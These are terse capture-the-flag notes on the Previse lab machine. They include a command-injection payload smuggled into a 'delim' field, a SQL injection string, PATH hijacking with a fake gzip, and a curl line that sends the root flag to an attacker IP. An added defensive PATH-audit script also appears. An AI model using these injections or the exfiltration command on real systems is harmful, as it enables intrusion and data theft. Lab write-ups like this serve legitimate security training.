Previse

1. Enumeration

ffuf -w /media/lrb/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.previse.htb" -u http://previse.htb -fc 301

ffuf -w ../burp-parameter-names.txt -u "http://10.10.11.104/config.php?FUZZ=abcd"

# Following endpoints are available:
http://10.10.11.104/nav.php
http://10.10.11.104/accounts.php
http://10.10.11.104/files.php
http://10.10.11.104/status.php
http://10.10.11.104/file_logs.php

1623978778,m4lwhere,32
http://10.10.11.104/download.php?file=32

cat file_logs | cut -d, -f3 | sort -n | uniq

config.php: $user = 'root'; $passwd = '[redacted]';

user12';-- -

SELECT * FROM accounts WHERE username = '{$username}';

grep -irF '$_POST' .

- logs.php: delim=comma;curl+http%3a//10.10.14.2%3a7906

- mysql: password contains salt and icons in text:
select TO_BASE64(password) from accounts where username="m4lwhere";

2. Priv Esc [ creating gzip executable in custom location ]

export PATH=/home/m4lwhere:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
nano gzip
curl http://10.10.14.5:7908/$(cat /root/root.txt)
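
A defender-side check for the PATH-ordering issue this step relies on, as an added example that is not part of the original notes: given a PATH string, it reports which directory would supply a bare command name such as gzip and whether that directory is on an allow-list. The function names and the TRUSTED_DIRS list are assumptions made for the example.

```sh
#!/bin/sh
# Added example, not from the original notes: report which PATH directory
# would supply a bare command name, and whether that directory is trusted.
# TRUSTED_DIRS is an assumed allow-list; adjust it to the host's policy.
TRUSTED_DIRS="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# resolve_dir CMD PATHSTRING: print the first directory holding an
# executable regular file named CMD. An empty entry means the current
# directory, which is how the shell itself treats it.
resolve_dir() {
    r_rest="$2:"
    while [ -n "$r_rest" ]; do
        r_dir=${r_rest%%:*}
        r_rest=${r_rest#*:}
        [ -n "$r_dir" ] || r_dir=.
        if [ -f "$r_dir/$1" ] && [ -x "$r_dir/$1" ]; then
            printf '%s\n' "$r_dir"
            return 0
        fi
    done
    return 1
}

# is_trusted DIR: succeed only if DIR is an exact entry of TRUSTED_DIRS.
is_trusted() {
    case ":$TRUSTED_DIRS:" in
        *":$1:"*) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_cmd CMD PATHSTRING: status 0 = trusted, 1 = untrusted, 2 = not found.
audit_cmd() {
    a_dir=$(resolve_dir "$1" "$2") || { echo "NOTFOUND $1"; return 2; }
    if is_trusted "$a_dir"; then
        echo "OK $1 -> $a_dir/$1"
    else
        echo "UNTRUSTED $1 -> $a_dir/$1"
        return 1
    fi
}

# Check the command named in these notes against the caller's current PATH.
audit_cmd gzip "$PATH" || true
```

Run it against the PATH a privileged job actually inherits; an UNTRUSTED result for a command the job calls by bare name means the job should call it by absolute path or run with a fixed PATH.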

Path:

• nav.php contains in-session app. pages
• create user using response modification
• Enumerating files by file ID
• Possible cmd injection - Yup 'logs.php'
• Horizontal PE to m4lwhere - hashed password in mysql DB is the same for system access
• to root via cron ?
